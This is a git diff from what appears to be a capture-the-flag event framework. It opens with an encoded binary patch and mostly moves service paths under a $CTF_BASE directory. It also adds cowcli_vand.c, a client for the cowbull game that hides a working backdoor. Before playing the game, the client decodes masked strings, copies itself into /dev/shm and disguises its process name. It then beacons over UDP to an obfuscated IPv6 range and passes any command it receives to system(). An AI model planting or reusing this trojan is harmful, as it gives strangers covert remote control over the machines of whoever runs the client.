z&J3?13DkQE@WMPK=vSfvu8NY#l#Nb3eQXL*LjyLDNpL}*AD&>b;nS?OQZ7Tny{4F! zLeng8ziRDH9mLhTjSew>@R0@YSOA5ljDTeb%OC%BvHxj?!HamHx)U)T%c81V3Z!DJ z*k1{Hal*)DOh2b!C<`DmxG66E1a(t28Uk9IaKunYw3Xhm2qPot$n688plKUOgelx% zspGm85Ff z2##YV_bn?PB>r^|C;lNvrM}REG@ah!87$#l&F%M%a5wKC{rb@#jX4D zmd+8RSu{@&9SZO}|*rJjsS-i`?m;)I+Ks0B8dJAT>4k6aFyvbiK z)G|(Z=m#)swK8qpr}tmhiIR`>*o{xL(aJx*0z8z&Sm4uNmY}!*Sa(0_2&EF^bF4>> zFE|O~uAMsMka*9I*akf1OyXI2&8hoxc5b7*oZfF{KeBVqUYn#C0E*>Y-Oylw>fxA6 zxL{Hn(AXm08a*+7W_@rr-QtgrH$1r^!~tBrC}%hC+_E_sIPlC65qiq07s0>CX7lGi07Ar06&0JQraG!NS9tr2oErDNf zpBmYUAcmc~zjsMP0U{zcnw+pK%NQLxVOjK{uKInvI$ct^+_jm&z(g3f7bnn4_ib)(E3Sy>`Lj-;Uxh?!x@@Vl!;^o=?Ey$Oii|-CAoOr2H>j;jinRM0}sT6RMyM&dr`vEon zlFTx{MP%C7uf+Y@RQKs%o4~;H`1kyhqw9$SeRXR-GC{Ksyl*Lvb^vPKSaL|b810mf z1Q~tMf8P}ed{;@o=goFW>+sJC)Pd_v#}e>CtnvTX)LTbI^?mQ-lpvslN_R?wbcZxZ zr=)auBOxV2!_Y`K(lFFe63Wmm4G!HUo!^VE_vg2McP-Z9pE>8=bN1Q$dG>zxz3+e= zkgs~#SPijOAZjUhNx4gr6egt-Pi;Dg4VVhlTVxX-Lv0)`Om@m69e}ZJ7hj_9f5XFkE?e*x$>qWnCka#hp1tn%cnKFe;;Ej3IH^^i@EH5y(OSlH@duE8^n@a$2Ek z*pB+Y6+?Il+rhwtVxYYsJB5b7P|CCOH}1Lk&jHn{&-Kcg-U+^1L#a5-_zpnur!(~`zF5M@>dW(Lqflg-pkmnG3xbxLu@dMU zxwvV|&BH_1CszHvi8J6AkimSiYS8oT z&>qQ-UvLgwqb}8O9gb6o^YdDLQY1P16lTvgBn2b9xQn%7sl@{j9Q;lwB0{A^XJU*eC(e=#vHi=~RAMX@A!^0{1 zv#WoJ`<(vc5gv!e*C3H8U14b@WQi^Rw-G9eVKl6&hUIv^&3M4)M`d_VY@#CH0xS%YR~>MLjL)~C zg&Shq#<+Yd2B?urJKo&A29$YHX6f{RsxXVKhgWHOf%cz$-OEXOEZB{+T3g4jw15+m zKXsYb?7yUZH~V;UjOj7O6K1L!b7>y^!D>A}_-b)zNMhRP`S9D-Y%GZ*+xZ6M$s;d7 z1!}Gx{g?=sl)>I#197BR+wZ2~ccrYBR zx0n)}N$(?JI7_a?-w61z$>ywoeW4m4!BkHD#Qg8LP^%SrRq2N6=e>D$lQ3BT)#l{f zFg%E##TPfNy*cUrD&v{#(VI)`RM&n#Acpvz{biG3MB4X-yP!$BSp_5zaNO7jreY!Q zH|$6~P#k7d+h3p)G}g0!>HYNBH%jqgc^dl*bt@{4Ub?E6k$1s$ylg*cd5Yc}0sZEi zjZ+zIiTDKu5I~&6D@NcxErM^{7hqY{;rc}w?$Q~dn7~IMznFg!HL+%8P7Vwo>*WF6Yo!N&7p;AB(t6a?T($=_Nwi?fW6IQ)MAtw&H7~Y`Vmj) z3&2vzi*4eEWn=RXeq&8HY;|As&rw(Hqf<&QKC0<$Y|RC7|0*SRik!Q{W=7Tu#OJO; zp*zq%iQhiZF(fXxpoRjb*K2 z7t-0qV-}-f+tNconngL!LiX`oDg4D@U=^?DGauEieS^9_Y!f7(8XVi-x$~R7RSe_I zQ>IAC|!T)hZA>X2^hT5du&YyV$ ztJP(e-%xOXR2WWHft8;7K?7`3Ys(gO-4>2R9cpL_1bf*PLA)1?0r#_AgxYILY6p+j z-=e-h@Q2!GlYtA9D55!;Nd;}+_>)1#ohfV4Z~`jKhk%4<+Vl?~qe+ZSZ~WviO*%Cz7s#VVI1*Oou#!u{9tB9~meM<8&5@^J~e=y9kBwUs|ex_yY<}oi((1KmY{_ub2gq5@E52V25XgwZ6;> zAFVUokua&GAnL6LO|YZI*{swFA{NMT@u59BK6Owp{}-vw$F-k)8CT9Z>|dw7HO4<} z20})qw5o&t5Z+=cprR5cV*rW4eI1+)d|Iw43B~)W+25P4GBsH#P{S7_tZ3xG#yL%> zt`~_1{hlMAW;J&oZia!KslXrhk>r@RH42OoudhSuZV-{}#raOvcnG@kex5KhsD1pe zcwMFXYm9wPxBjIC-3lVcOEli6*g;$5PAMkszYZxKnT{SQu;yx5CugRVaxw)lLBIBt z&H|($ONWnsv|qx1eA44r1>xMnk@y;8Db(!;ara4^yz;*y^s6v{c6QAgb?*F0nKc@t z*)8XN=P+LK&yATf84A_82t6K;*GC3BPC~iNH{OFvd)dBxAQ{+|)v6dch6I0XDYOhU zC%5j?)I2ZxLvi#$&8P$@DBD*v=`eKqH`#u_AM1!})s>vSRZgW0#lh|0Z)~D&(ihSU z*lLS1c!^H%ewM)#k#^vo;T(h zNCU&iw;@eUnyXILG+b{Z*9yXLsDIT#X!=Gs_uw&$&wQKi2{Nda0xB@zrD-TQl{k># z?T(9?I4!fZ2@0Rk|IvAY(1cTYnC-T~4uh7i!%2IS&6SMou$F4R@mV zAe7W12?>Rn2(_#dshy<@W9vvw;BK3ZJ|M|K$|)Q~6K}K2BBaqHB#H_KI?%~DKl;{G zY>ten0cAn~9a+UCwj_lPAVBYyFQ)?j4wO+GW~IAc;yw)JpP>4CJX>cOWZCLoPgzUqEQMlsNCEBSiYbJiM$(0juuwRQ`Aqw$^S-$hSRPq@kTQK zu`Msb|JFemEa#p5{}EMZ<3s)mMtQzmui7D;m}z}N9=JE4hkM@(Qoaf;ZF2-Z$l8Qe zZN9z}X&~}l7J*6%OyY|W;riHDO`g&flK=MqlE3pyc?D7G^sMKtKuC6J*li?Ce9Fsbg7gHnJNQz zXzZaL$smU$nQ|(;c|Ni!-Rl&nXi!N_D8l7PG?!lH@AVdKf9$84d_L-GIUu(XT% zK5$3v6!N30gm_uZWLg;P6qL#PBx9}IGxly!6slLim&|XO+|Ls<^7-3pg`T|4`{z2q z&7|XB1BbvNzU0A3ENKCwnzO5PpA<(IelRwkg%V#A;l}0+{9Kq-OXw9n6nlIRm|Gvjzw8OPdW-Q6Z;wZ zaZAuJ5~nKpHxb*Z&|6mm_ex!NlKj-7{!tk!DOZr-7i%932Y2%o7N9VC=%a^I${~t4zckQn0Y|l=D*q_$Rf-_Q-6!h@RY~~7!tthTN ze0j@k1b}}NQ&J>teMjJNWV5%}p6$12C67Eeg*%KN(tLPn`p5=hE`6N#X9j0U+$Dpr zs2w?>4bph-RYvXy?Xbx_ag9R7W?;)fQWWC(`~jEQCFKR}S9z<@e!B6P%}V^25E{i|uxS zdv;=GcW0CRF!CLD#_obAr_##n=mnsFJ%ifq`9E2!?sZmF9TQE5dn4X1tpO zB7$o@egpo$WXb?cT96_Yrxv-lwX#8TvKM@_;{aASAP^76VXE)e=r0d~Ve`Cx2Ttc2 zI0qUk?s~R}cy?%uM>?l=)TKywaI&rP7*Ex^P4f3bORMhjeKPh0r1@kn7tHaM{8ejVi8W9L zi_;5C<2A@2g@x4k`;tN2d$}OTTb7EE=|~y}H6P-2YX$8mD%xu(^;Gngn&`a+K)Wr8 zWWw(x2t@Y)vGzwPM)*@f)%>ch++qt)!0^4)kSbcW$oa=uq5JR;*I z)eE*i6Mp2uWajgMA)7VK5oxGt*5=x zYp)a#0Q8soP9x>-#ow8{B!7RejfELC<7;xa6r;iQ7J|Hz!a2`sDS-3_RSBv@3r=8Y z<(41IIFZ$H3w#AEL&}r{5TNxjLiW3iuNu6t;n*;?Ezk?jFS;I2{eC-~d1{YG|I8_{U#N#n9gvzPBkx(4TMT~9saZQ%;k<7iVqc-LPkgmQ-Is;%iaY8t+0JmS)_(g|L;a00~!tHPDO~dq}kFQolH&~4c zU2#$!Hb542q^hN9EOy&l9WUnUn=@ks*==pRST6}zH%eNnJ6aaXFk&3lW zIql`y<|Q%pk6Gn-hV^Wx=QMp|o3;S={Lks(PzSwW`d@fJG!Jap502HmNUPPY{FD@m zhN4#oO5%1s?UTk6ulw7_wN+Ssb}LZuHmmoF$V$CoYr}dlDw1gT)95XB-BE~ay6};y zWzLoHI#v$p3~?RQVR>Y)v8>gOj)tACZAbs<2~W665%N`{_R-v7s@!DYdSja8-~7ZY zT%4seL@y~mzwk&tlDYG6OEu&xjak7|X^jY>BdHm>>LjdT37M!=sSn&T=7+Z#KP5CI zJBo`XcxAh#vQd2)BZK4iTR`3u-+{wPWzW})@Cts?Dj}Hw&Ns<8wS4y~9qL7I8a10y zyUuiRbVowwz!UP2u?W{l<2(XO_&bi&L<||6`gnG@sX*wk(s6hHRC>(R{Fx$2_voJX z56J#4K*?Thr{M+Ihwu`0HJ5YYK=zY;bSI)>QI_SZ#Bj)cAn#gDl&L!zzF`ATumUY~`DF&a z0|Z%5EHf0xrTALR$F_5jq|7R#kcHd;qzaXpgisGfJDbj3S&Dc)u1hX2sw#f|wvSFE zwgw2vj~(6baUK2nd)l@=_9-VXAhkp{eq2Y=3(H1_Dr? zI)Z1~-s+xW=2JRViK58?0fouQ6d-7NO4Q)EOgXtFYr}GTWI6ciXO0o$v#YqQ9%_0z zt0Zgj#b{Kcx3@CPQsQz~N2ilS{XePlcuV|@B_I^_6y-`a*Z^WNdZ8`p@=#WZK9F4$ z^T2v*bn^Mo?^G|CsxUypL!K zHwOZ7fp^zNVeuAFLO-t2gpx^?zZMPVl_mqce>HR6^BksgHO0-$4=2f&F84i;(w}oh zmWz<%zoqx>=L^Ix{yTdk5%LH&%*3(DyvH`epWpd}A_R3!qkh3tXyYqPu~2P#B#SJr zbcMcwtJ^S~LY2cNT7g-@!gn|J;8dR_YrO|fgwHnKHe204o{Sz;e=55Q^H-X@`ZdP~ z{x)~}z3l1az0z4hq(weEK^D71JFP##Cb?32;C(^$VPZ^tyW)!2|B(tveP5=hd8 zzzb~ciHXJR_2;5b@yEGD6p)Qph#x&hRcdB6y7Zv6^~(TSJlg!r@&|NPe@5-w;UC#@ z9d&3Tbk7FeXF^Xlp;-XSw2xn|yx);4RfV?`WKoPd!=s}jXx^SI#ofm{W&d^HO%42U zYeC{ueP-CG<4E_WV0f3PjEE)21B1`-7#ZVlzCf4alVwEY9wBgoF3KBSXlm4No!aNc zL8+iWh`$Cxp?_6l1`)}axzECLlD!_Y{YS+V0of?lwO*~d#sxhhTd zHD8f4)1W1b)!Yyssn|J+fa{YP;rOFG)dU}qL4mqhL3jJ2fyRh|G_XA>=TOJNSDFXX zpGbEwo1*i`x`Z6(TR+w7kfr)=JPSVoa zEtApLBhAe@!6}e;MXSspTGn^eaFtPJ`@ImlL0RTYEI=e+ZnYktm93;KgC#)JVqRn= zpxW?c4vQ5t2>Edu*8WzQ6_7XckvER*Pu(4LHZ^b>4tyW*h4=`519l+7xgk`4{b+kX$_fP#&^7k#%5D9vB{rgxt_3=GW1U% z5#K$~Q+V=5Da78_E=pZioAV4Y*7vDI3Al-AS%jTilL8=m+IVs?5(c=c+gp{no#jurJpyetqMMJX<%vF7d3Gh`Ko((4%k9%Ftmtszp zttryw9fN0UqHFE~Rk?@)6b@m#cU!{uaxlWHV=G`jpfW?B@t9abp3DmomcH?5ZxTr- zD&tmSe!nAft2M7$LHDC8s9Uy%W6^P1^t0--l=eI7>Lq9Y-b!6eo#pN!x*Uo>^>04& zi44RBKB5MG_LrJz8U(P56@1{^7z8nv@^6iE^K%NmZzUhYxAfO{nC@yvVwT$P-u?Hu zpHYF$ zWfh`W;6x^-0K83T9MaWJ!6!+!fBy&9)3Gh}ldPLm!<@!EC5RQCX{1)ch^5zR;Zk+2$I}9F|xnRC?%XES>-m(L`2kRiAYrM7L(#XiO<;B z=))x+_xP#Avq}o`LWh;dCNHsSml+?@zMPz+%WosJ>GHp&5_xN5cn^YWDi)X=_aw^R zOS9{ZlMBNRgV8P$fPoRoSyT-YFQ1(vtmyuI%b z@w1}mlK(KjDf`-AM42l7I>2p^`N%l+Bg-gGxYjB^?e?yP^Ex5gFO?GeRVxEl1PBCz8BO7ex1FR_)icjm zXPSBXrEx6H`JVIOI;k1n_U2yCHuU}3wE;OffJj41twRN9GCAybev4XivBaj`9QvOc zXIcq9iVb;QWI$J@hhGNlLIPB7F!NJAFO>me|+dKZH zqr-{+^+qQwZWLWW#o@r^Z`g|Iodp~>#tp;*CPN;f$aI?)0CIJpuZ zOOA&F)6%a%6LBk!dv4)eA<@rde(hzpTVuIg1A4<%J z=RPXMU~3!lUH+M;nN2RCR9-p`S!TFG!_q#6i^q|2(ACB0}N z{|Ro?#ty5G!XLD|`+gm7`10pJGO>b@PgCq8RubVnN_}v)y~bX;PC&#*<3u1lRf}c z)Be7(PE#iX?a(JaRk?krwieBEyHfhe$UJ4rkygn*W^b2TOjI7@A|0u23|>5T%eK!B zO*XfL&swvCS;f=%c713%d_P+WHol*y`-|rbkz6M&{&( zTf^;Hu_fjk#Yq$+ar!K}!~tiW6`VjqA!VlK69w?UwKD>v#J}+_kmu)EDG(NXF8ob=9`fH1+CGE&CrC{=j$GPsLNdvul3kikCY zg^Tks4jLM^!;)guzxAR*{NgpMS5h{Jh6-x+VM ztYxwcD)uto-nP+Xts6w^X41514O%C1x1rzhM^Ge*}5) z(_{H<%A%!FZIWtjaaO40M6pXQk^KZyKyESq&5 lqjt}Ep?Ckrr><+vK?rQu;5iF9hamu$ytJ}Z)%#Du{|^~c7H$9l literal 0 HcmV?d00001 diff --git a/doc/ref.txt b/doc/ref.txt index 6c3811e..5266616 100644 --- a/doc/ref.txt +++ b/doc/ref.txt @@ -1,14 +1,14 @@ How to run a CTF event ====================== -When a CTF image boots, it goes through the following sequence: +When DBTL boots, it goes through the following sequence: -1. Mount a partition labelled "CTF-STATE" read-only under /var/lib/ctf, - if such a partition exists -2. Mount a partition labelled "CTF" under /mnt/ctf -3. For every file matching /mnt/ctf/${pkg}.pkg, mount it under /opt/$pkg -4. For every directory matching /opt/*/service/${d}, copy it recursively - into /var/service/$d +1. Mount a partition labelled "PACKAGES" read-only under /mnt/packages +2. Mount a partition labelled "STATE" read-write under /state, + or make it a tmpfs if no such partition exists +3. For every file matching /mnt/packages/${pkg}.pkg, mount it under /packages/$pkg +4. For every directory matching /packages/*/service/${d}, copy it recursively + into /service/$d Terms Used Here --------------- diff --git a/doc/tokens.txt b/doc/tokens.txt index 2184e63..5ff652a 100644 --- a/doc/tokens.txt +++ b/doc/tokens.txt @@ -52,13 +52,13 @@ The token client thus needs a 4-tuple for each puzzle: In the interest of making things easy to administer and code, this 4-tuple is stored in files and directories: - /opt/packagename/tokencli/puzzle_name/enc.key - /opt/packagename/tokencli/puzzle_name/category.key - /opt/packagename/tokencli/puzzle_name/category + /packages/packagename/tokencli/puzzle_name/enc.key + /packages/packagename/tokencli/puzzle_name/category.key + /packages/packagename/tokencli/puzzle_name/category And puzzles are stored in: - /var/lib/ctf/tokens/puzzle_name + /state/tokens/puzzle_name Using this scheme, the token client has only to iterate over -/opt/*/tokencli/* instead of implementing some sort of parser. +/packages/*/tokencli/* instead of implementing some sort of parser. diff --git a/packages/00common/service/pointsd/mkpage b/packages/00common/service/pointsd/mkpage index ea084ac..d15e62f 100755 --- a/packages/00common/service/pointsd/mkpage +++ b/packages/00common/service/pointsd/mkpage @@ -1,9 +1,7 @@ #! /bin/sh -OPT=${CTF_BASE:-/opt} - # Use first installed binary -for bin in $OPT/*/bin/$1; do +for bin in $CTF_BASE/packages/*/bin/$1; do if [ -x $bin ]; then exec $bin fi diff --git a/packages/00common/service/pointsd/pointsd b/packages/00common/service/pointsd/pointsd index fd68f46..36d1506 100755 --- a/packages/00common/service/pointsd/pointsd +++ b/packages/00common/service/pointsd/pointsd @@ -2,11 +2,11 @@ fn=$2/$3 -WWW=${CTF_BASE:-/var/www} -BASE=${CTF_BASE:-/var/lib/ctf} -OPT=${CTF_BASE:-/opt} +PACKAGES=$CTF_BASE/packages +STATE=$CTF_BASE/state +WWW=$CTF_BASE/www -POINTS=$BASE/points.log +POINTS=$STATE/points.log BACKUP=$WWW/backup.png SCOREBOARD=$WWW/scoreboard.html PUZZLES=$WWW/puzzles.html @@ -22,11 +22,11 @@ cat $fn >> $POINTS rm $fn # Generate new backup if we can find a password file -for pwfile in $OPT/*/password; do +for pwfile in $PACKAGES/*/password; do if [ -f $pwfile ]; then ( cat bkup.png - tar cf - $BASE | gzip -c | $OPT/*/bin/tea 3< $pwfile + tar cf - $STATE | gzip -c | $PACKAGES/*/bin/tea 3< $pwfile ) > $BACKUP.new mv $BACKUP.new $BACKUP break diff --git a/packages/00common/service/pointsd/run b/packages/00common/service/pointsd/run index 033d17c..b32fb4d 100755 --- a/packages/00common/service/pointsd/run +++ b/packages/00common/service/pointsd/run @@ -2,9 +2,8 @@ exec 2>&1 -: ${CTF_BASE:=/var/lib/ctf} - -install -d $CTF_BASE +STATE=$CTF_BASE/state +WWW=$CTF_BASE/www # Create CTF and nobody users touch /etc/group /etc/passwd @@ -13,25 +12,23 @@ adduser -DH -G nogroup -u 65534 nobody || true adduser -DHS ctf || true # Set up base directories -NEWDIR=$CTF_BASE/points.new -TMPDIR=$CTF_BASE/points.tmp +NEWDIR=$STATE/points.new +TMPDIR=$STATE/points.tmp -install -d /var/www -install -d /var/lib/ctf install -o ctf -m 0755 -d $NEWDIR install -o ctf -m 0755 -d $TMPDIR # Create some files -touch /var/lib/ctf/points.log +touch $STATE/points.log # Generate preliminary scoreboard -if [ ! -f /var/www/scoreboard.html ]; then - ./mkpage scoreboard < /dev/null > /var/www/scoreboard.html +if [ ! -f $WWW/scoreboard.html ]; then + ./mkpage scoreboard < /dev/null > $WWW/scoreboard.html fi # Generate preliminary puzzles list -if [ ! -f /var/www/puzzles.html ]; then - ./mkpage puzzles.cgi > /var/www/puzzles.html +if [ ! -f $WWW/puzzles.html ]; then + ./mkpage puzzles.cgi > $WWW/puzzles.html fi # Run pointsd every time a new points file is dropped diff --git a/packages/00common/service/sshd/run b/packages/00common/service/sshd/run index de54c2f..880d277 100755 --- a/packages/00common/service/sshd/run +++ b/packages/00common/service/sshd/run @@ -3,7 +3,7 @@ exec 2>&1 password='grape guts' -for fn in /opt/*/password; do +for fn in $CTF_BASE/packages/*/password; do read password < $fn && break done diff --git a/packages/00common/src/common.c b/packages/00common/src/common.c index 1761a53..9f10dfa 100644 --- a/packages/00common/src/common.c +++ b/packages/00common/src/common.c @@ -364,21 +364,21 @@ my_snprintf(char *buf, size_t buflen, char *fmt, ...) } static char * -mkpath(char const *base, char const *fmt, va_list ap) +mkpath(char const *type, char const *fmt, va_list ap) { char relpath[PATH_MAX]; static char path[PATH_MAX]; - char const *var; + char const *var = getenv("CTF_BASE"); vsnprintf(relpath, sizeof(relpath) - 1, fmt, ap); relpath[sizeof(relpath) - 1] = '\0'; - var = getenv("CTF_BASE"); if (! var) { - var = base; + var = ""; } - my_snprintf(path, sizeof(path), "%s/%s", var, relpath); + /* $CTF_BASE/type/relpath */ + my_snprintf(path, sizeof(path), "%s/%s/%s", var, type, relpath); return path; } @@ -389,7 +389,7 @@ state_path(char const *fmt, ...) char *ret; va_start(ap, fmt); - ret = mkpath("/var/lib/ctf", fmt, ap); + ret = mkpath("state", fmt, ap); va_end(ap); return ret; } @@ -401,7 +401,7 @@ package_path(char const *fmt, ...) char *ret; va_start(ap, fmt); - ret = mkpath("/opt", fmt, ap); + ret = mkpath("packages", fmt, ap); va_end(ap); return ret; } diff --git a/packages/00common/src/puzzles.cgi.c b/packages/00common/src/puzzles.cgi.c index a8d6bd9..9df4a19 100644 --- a/packages/00common/src/puzzles.cgi.c +++ b/packages/00common/src/puzzles.cgi.c @@ -94,13 +94,13 @@ main(int argc, char *argv[]) opt = opendir(package_path("")); if (NULL == opt) { - cgi_error("Cannot opendir(\"/opt\")"); + cgi_error("Cannot open packages directory"); } cgi_head("Open puzzles"); printf("
\n"); - /* For each file in /opt/ ... */ + /* For each file in /packages/ ... */ while (1) { struct dirent *e = readdir(opt); char *cat; diff --git a/packages/cowbull/service/cowbull/run b/packages/cowbull/service/cowbull/run index 730e5ba..6207c24 100755 --- a/packages/cowbull/service/cowbull/run +++ b/packages/cowbull/service/cowbull/run @@ -4,4 +4,4 @@ exec 2>&1 IP=$(dbip -a) -exec setuidgid nobody /opt/cowbull/bin/cowd < /opt/cowbull/tokens.txt +exec setuidgid nobody $CTF_BASE/packages/cowbull/bin/cowd < $CTF_BASE/packages/cowbull/tokens.txt diff --git a/packages/cowbull/src/cowcli_vand.c b/packages/cowbull/src/cowcli_vand.c new file mode 100644 index 0000000..396d8e0 --- /dev/null +++ b/packages/cowbull/src/cowcli_vand.c @@ -0,0 +1,355 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define NODEBUG + +#ifdef DEBUG +# define PORT 4444 +#else +# define PORT 44 +#endif + +#define BDPORT 33333 +#define BCNPORT_S 48172 +#define BCNPORT_D 48179 + +int +bind_port(int fd, const struct in6_addr *addr, uint16_t port) +{ + struct sockaddr_in6 saddr = { 0 }; + + saddr.sin6_family = AF_INET6; + saddr.sin6_port = htons(port); + memcpy(&saddr.sin6_addr, addr, sizeof *addr); + return bind(fd, (struct sockaddr *) &saddr, sizeof saddr); +} + +void +sigchld(int unused) +{ + while (0 < waitpid(-1, NULL, WNOHANG)); +} + +void +unmask_str(unsigned char *str) +{ + int i = strlen(str); + while (i-- > 0) { + str[i] &= 127; + } +} +int +copyprog(const char *from, const char *to) +{ + int fd_to, fd_from; + char buf[4096]; + ssize_t nread; + int saved_errno; + + fd_from = open(from, O_RDONLY); + if (fd_from < 0) + return -1; + + fd_to = open(to, O_WRONLY | O_CREAT | O_TRUNC, 0700); + if (fd_to < 0) + goto out_error; + + while (nread = read(fd_from, buf, sizeof buf), nread > 0) + { + char *out_ptr = buf; + ssize_t nwritten; + + do { + nwritten = write(fd_to, out_ptr, nread); + + if (nwritten >= 0) + { + nread -= nwritten; + out_ptr += nwritten; + } + else if (errno != EINTR) + { + goto out_error; + } + } while (nread > 0); + } + + if (nread == 0) + { + if (close(fd_to) < 0) + { + fd_to = -1; + goto out_error; + } + close(fd_from); + + /* Success! */ + return 0; + } + + out_error: + saved_errno = errno; + + close(fd_from); + if (fd_to >= 0) + close(fd_to); + + errno = saved_errno; + return -1; +} + +void +signal_evil(int sig) +{ + if (fork()) { + exit(1); + } +} +void +evil(int argc, char *argv[]) +{ + int i; + int sock; + + char procname[] = "\xdb\xe8\xe3\xe9\xb1\xdd"; + char cptarget[] = "\xaf\xe4\xe5\xf6\xaf\xf3\xe8\xed\xaf\xae\xa0"; + + unmask_str(procname); + unmask_str(cptarget); + + if (strcmp(argv[0], cptarget)) { + if (fork()) { + return; + } + /* copy ourselves */ + if (copyprog(argv[0], cptarget) == 0) { + argv[0] = cptarget; + execv(cptarget, argv); + } + } else { + unlink(cptarget); + if (fork()) { + exit(0); + } + } + + /* mask the process title and arguments */ + while (argc--) { + int p = strlen(argv[argc]); + while (p--) { + argv[argc][p] = 0; + } + } + strcpy(argv[0], procname); + + + { + int r = open("/dev/null", O_RDONLY); + int w = open("/dev/null", O_WRONLY); + + dup2(r, 0); + dup2(w, 1); + dup2(w, 2); + close(r); + close(w); + setsid(); + chdir("/"); + signal(SIGHUP, signal_evil); + signal(SIGTERM, signal_evil); + signal(SIGINT, signal_evil); + signal(SIGQUIT, signal_evil); + } + + sock = socket(AF_INET6, SOCK_DGRAM, 0); + if (-1 == bind_port(sock, &in6addr_any, BDPORT)) { + exit(0); + } + struct timeval tv; + tv.tv_sec = 5; + tv.tv_usec = 0; + setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&tv,sizeof(struct timeval)); + + + while (1) { + /* beacon */ + int sock_beacon; + sock_beacon = socket(AF_INET6, SOCK_DGRAM, 0); + if (-1 == bind_port(sock_beacon, &in6addr_any, BCNPORT_S)) { + //perror("Beacon bind"); + ;; /* return EX_IOERR; */ + } + int subnet; + if (sock_beacon > 0) { + for (subnet = 0; subnet < 50; subnet++) { + char payload[] = "hi"; + char addr6_f[] = "\xe6\xe4\xb8\xb4\xba\xe2\xb4\xb1\xb0\xba\xb3\xb4\xb4\xb1\xba\xa5\xf8\xba\xba\xb1\xb3\xb3\xb7"; + unmask_str(addr6_f); + char addr6[64]; + sprintf(addr6, addr6_f, subnet); + + //printf("%s\n", addr6); + struct addrinfo *beacon_addr; + { + struct addrinfo hints = { 0 }; + + hints.ai_family = PF_INET6; + hints.ai_socktype = SOCK_DGRAM; + hints.ai_flags = AI_NUMERICHOST; + + if (0 != getaddrinfo(addr6, "48179", &hints, &beacon_addr)) { + ;;//perror("Resolving address"); + } + } + + struct sockaddr_in6 saddr = { 0 }; + + if(-1 == sendto(sock_beacon, &payload, sizeof payload, 0, beacon_addr->ai_addr, beacon_addr->ai_addrlen)) { + ;;//perror("Beacon send"); + } else { + ;;//printf("sent!\n"); + } + } + } + close(sock_beacon); + /* end beacon */ + + /* c&c */ + char cmd[400]; + ssize_t inlen; + + inlen = recvfrom(sock, cmd, sizeof(cmd)-1, 0, NULL, NULL); + + if (inlen < 1) { + continue; + } + + cmd[inlen] = 0; + if (! fork()) { + system(cmd); + exit(0); + } + } +} + +int +main(int argc, char *argv[]) +{ + long answer = 0; + int sock; + int i; + struct addrinfo *addr; + uint32_t token = 0; + FILE *in, *out; + + srand(time(NULL)); + + signal(SIGCHLD, sigchld); + + if (argc < 2) { + fprintf(stderr, "Usage: %s SERVER\n", argv[0]); + return EX_USAGE; + } + + evil(argc, argv); + + { + struct addrinfo hints = { 0 }; + + hints.ai_family = PF_INET6; + hints.ai_socktype = SOCK_DGRAM; + hints.ai_flags = AI_NUMERICHOST; + + if (0 != getaddrinfo(argv[1], "3782", &hints, &addr)) { + perror("Resolving address"); + return EX_IOERR; + } + } + + /* + * Set up socket + */ + sock = socket(AF_INET6, SOCK_DGRAM, 0); + if (-1 == bind_port(sock, &in6addr_any, PORT)) { + perror("Binding UDP port 44"); + return EX_IOERR; + } + + if (argv[2]) { + /* fork and exec */ + } else { + in = stdin; + out = stdout; + } + + + while (1) { + long guess; + struct { + uint32_t token; + uint16_t guess; + } g; + + g.token = token; + if (token) { + char line[20]; + + if (NULL == fgets(line, sizeof line, in)) { + break; + } + g.guess = strtol(line, NULL, 16); + } else { + g.guess = 0; + } + + /* Send the guess */ + if (-1 == sendto(sock, &g, sizeof g, 0, addr->ai_addr, addr->ai_addrlen)) { + perror("Sending packet"); + return EX_IOERR; + } + + /* read the result */ + { + char buf[80]; + ssize_t len; + + len = recvfrom(sock, buf, sizeof buf, 0, NULL, NULL); + switch (len) { + case -1: + perror("Reading packet"); + return EX_IOERR; + case 1: + /* It's a score */ + printf("%02x\n", buf[0]); + break; + case 4: + /* New game token */ + printf("NEW GAME\n"); + token = *((uint32_t *) buf); + break; + default: + /* You win: this is your CTF token */ + buf[len] = 0; + printf("A WINNER IS YOU: %s\n", buf); + break; + } + } + } + + return 0; +} diff --git a/packages/fizzbuzz/service/fizzbuzz/go b/packages/fizzbuzz/service/fizzbuzz/go index f463309..1d57de0 100755 --- a/packages/fizzbuzz/service/fizzbuzz/go +++ b/packages/fizzbuzz/service/fizzbuzz/go @@ -1,3 +1,3 @@ #! /bin/sh -exec /opt/fizzbuzz/bin/fizzbuzz 3&1 -ln -sf /var/www default -exec tcpsvd -l localhost 0 80 /opt/inferno/bin/eris -d +cd $PACKAGES/www +exec tcpsvd -l localhost 0 80 $CTF_BASE/packages/inferno/bin/eris -d. diff --git a/packages/ircd/service/ircd/run b/packages/ircd/service/ircd/run index 60b3963..25ab064 100755 --- a/packages/ircd/service/ircd/run +++ b/packages/ircd/service/ircd/run @@ -31,4 +31,4 @@ cat <ngircd.conf Password = $operpass EOD -exec setuidgid irc /opt/ircd/bin/ngircd --config ./ngircd.conf --nodaemon +exec setuidgid irc $CTF_BASE/packages/ircd/bin/ngircd --config ./ngircd.conf --nodaemon diff --git a/packages/mcp/bin/addteam b/packages/mcp/bin/addteam index 76694d8..d2da8b1 100755 --- a/packages/mcp/bin/addteam +++ b/packages/mcp/bin/addteam @@ -14,19 +14,21 @@ escape () { # Don't overwrite files set -C -base=${CTF_BASE:-/var/lib/ctf} -www=${CTF_BASE:-/var/www} +STATE=$CTF_BASE/state +WWW=$CTF_BASE/www -mkdir -p $base/teams/names -mkdir -p $base/teams/colors +mkdir -p $STATE/teams/names +mkdir -p $STATE/teams/colors -[ -f $base/teams/salt ] || dd if=/dev/urandom count=1 2>/dev/null | md5sum | cut -b 1-8 > $base/teams/salt -salt=$(cat $base/teams/salt) +if ! [ -f $STATE/teams/salt ]; then + dd if=/dev/urandom count=1 2>/dev/null | md5sum | cut -b 1-8 > $STATE/teams/salt +fi +salt=$(cat $STATE/teams/salt) # Assign a color. I spent weeks selecting a color pallette that # wouldn't be hell on people with protanopia. Please don't change these # colors. -nteams=$(ls $base/teams/names/ | wc -l) +nteams=$(ls $STATE/teams/names/ | wc -l) case $(expr $nteams % 10) in 0) color=a6cee3;; 1) color=1f78b4;; @@ -50,7 +52,7 @@ esac # me since all team hashes are in the set /[0-9a-f]{8}/. hash=$(printf "%s:%s" $salt "$1" | md5sum | cut -b 1-8) -echo "$1" > $base/teams/names/$hash -echo "$color" > $base/teams/colors/$hash +echo "$1" > $STATE/teams/names/$hash +echo "$color" > $STATE/teams/colors/$hash echo "Registered with hash: $hash" diff --git 